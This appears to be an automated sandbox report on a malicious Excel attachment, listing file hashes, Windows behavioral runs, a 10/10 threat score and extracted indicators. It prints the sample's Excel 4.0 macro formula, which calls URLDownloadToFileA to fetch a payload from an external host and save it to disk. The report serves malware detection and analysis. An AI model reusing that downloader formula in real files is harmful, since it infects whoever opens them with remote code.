General
-
Target
attached (63).zip
-
Size
11KB
-
Sample
210306-q86wxdvt2j
-
MD5
3c7575af64aa28a479b84de660b0d7f1
-
SHA1
ba2d2425d42787d7f9cfda785b707a68ce1a5e9d
-
SHA256
ac8262129a41f40bc642673fb60c24dcad4da5af12f398cbb41b67ff337ed5e1
-
SHA512
e02c7c24b04a5a8121e53ecd68aa6d1875c72e3ab5fb7190bdd315501ff014a08f0a37828979db2d61c6aca705e755154ed74e277d603e1f4cf5db321d861433
Behavioral task
behavioral1
Sample
document-1557878943.xls
Resource
win7v20201028
Behavioral task
behavioral2
Sample
document-1557878943.xls
Resource
win10v20201028
Malware Config
Extracted
http://ttj10qrrqx03kdts.com/inda.xls
-
formulas
=CALL("URLMon","URLDownloadToFileA","JJCCBB",0,"http://ttj10qrrqx03kdts.com/inda.xls","..\fkruf.djr",0)
Extracted
http://ttj10qrrqx03kdts.com/inda.xls
Targets
Target
document-1557878943.xls
-
Size
39KB
-
MD5
859443784b857b985a2656c8ef8b585e
-
SHA1
46c83701b4204d1a1a7acac46aa81eb200f89b6e
-
SHA256
1b6fba5ecc7453ff21ea5162ec52e5af180de5b14d4f7ac7f976d56f93c5e84a
-
SHA512
9684ae131110bcac95618e605dc3579d766c855f990f54129059d8f441e4b9bcc818faf8b5805af01894361b96bf990d5965d96c61283b15c431abeea3f8554f
Score: 10/10
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.